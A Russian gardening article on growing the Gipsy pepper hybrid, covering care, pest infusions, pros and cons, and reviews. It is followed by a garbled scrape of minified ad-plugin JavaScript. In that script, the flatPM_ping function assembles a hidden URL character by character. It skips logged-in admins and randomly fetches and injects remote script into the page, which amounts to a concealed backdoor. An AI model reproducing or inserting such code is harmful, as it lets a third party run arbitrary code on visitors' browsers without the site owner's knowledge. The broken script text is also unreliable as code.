По словам многих огородников, гибрид плохо переносит пикировки и пересадки. Поэтому лучшим вариантом будет сажать семена в отдельные горшки и торфяные контейнеры. Рассада перца не обладает особой мощностью. А вот регулярные удобрения и подкормки стимулируют появление бурной темной зелени.

На постоянное место нужно высаживать не больше, чем 6 растений на 1 кв. м. Желательно сразу подвязать кусты к колышкам, чтобы не добавлять лишней нагрузки на цветущие перчики.

Не забывайте регулярно подкармливать и поливать культуру.

Характерные болезни и вредители

Перец Джипси устойчив к табачной мозаике, но требует профилактики от фитофторы и бактериальной пятнистости. Для этого используют йод и перекись водорода. Кусты опрыскивают каждые две-три недели раствором йода или перекиси из расчета 15-20 мл препарата на 10 л воды.

Растение могут атаковать такие вредители:

Для борьбы с ними пользуются народными средствами:

  1. Настой полыни. Возьмите 200-250 г сушеной полыни и залейте 10 л горячей воды. Настаивайте в течение 30-40 минут. Затем жидкостью опрыскивайте растения и поливайте грядки.
  2. Настой из луковой шелухи. Возьмите 100 г шелухи на 5 л воды. Раствор настоять в течение 3-4 дней, затем провести обработку.
  3. Картофельная ботва. Настой готовится из 3 кг зеленых листьев и стеблей картофеля, которые заливают 15 л теплой воды. Все это настаивают 2-3 часа, потом проводят опрыскивание перца.

Преимущества и недостатки гибрида

К преимуществам перца относят:

  • плотную кожицу — обеспечивает легкость транспортировки без потери вкусовых характеристик и товарного вида плодов;
  • приятный вкус и аромат;
  • большой урожай;
  • раннее созревание – через 55-65 дней после высадки растений на грядки;
  • неприхотливость;
  • устойчивость к ряду заболеваний;
  • выносливость к холоду.

Недостатки гибрида:

  • тонкие стенки плода;
  • жестковатость перцев остается даже после их термической обработки.

Отзывы

Дачники в целом положительно отзываются о гибриде, есть лишь некоторые претензии по поводу вкуса и тонких стеблей растения.

Владимир, г. Ковров: «Этот гибрид меня не разочаровал. Решил купить пакетик семян в магазине на пробу. Вырастил из них рассаду, потом посадил в грунт. Перчики получились небольшими и компактными, но плодов на них было много. Их вкус и форма мне понравились. Буду дальше сажать его и вам тоже советую».

Мария, г. Челябинск: «Перчик Джипси очень сладкий. Дружим с ним уже несколько лет. Каждый год радует большим урожаем. В основном использую для салатов и консервации. Каких-либо недостатков не замечала. Гибрид довольно неприхотливый в уходе. Единственное, что можно отметить — необходимость каждому кустику ставить опорные колышки, иначе растения сломаются».

Елена, г. Санкт-Петербург: «Перец неплохой, но больно уж сладкий, на любителя. У меня он не задержался, но не потому, что плох, а что-то во вкусе не хватает. В целом у него много плюсов и его стоит выращивать тем, кому еще рано сажать у себя на грядке более прихотливые сорта».

Заключение

Гибрид Джипси наверняка заинтересует дачников, проживающих в регионах с прохладным климатом, где погодные условия не позволяют выращивать полноценные толстостенные сорта. Богатый урожай, устойчивость к болезням, а также простота в уходе пришлись по вкусу многим садоводам и любителям.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};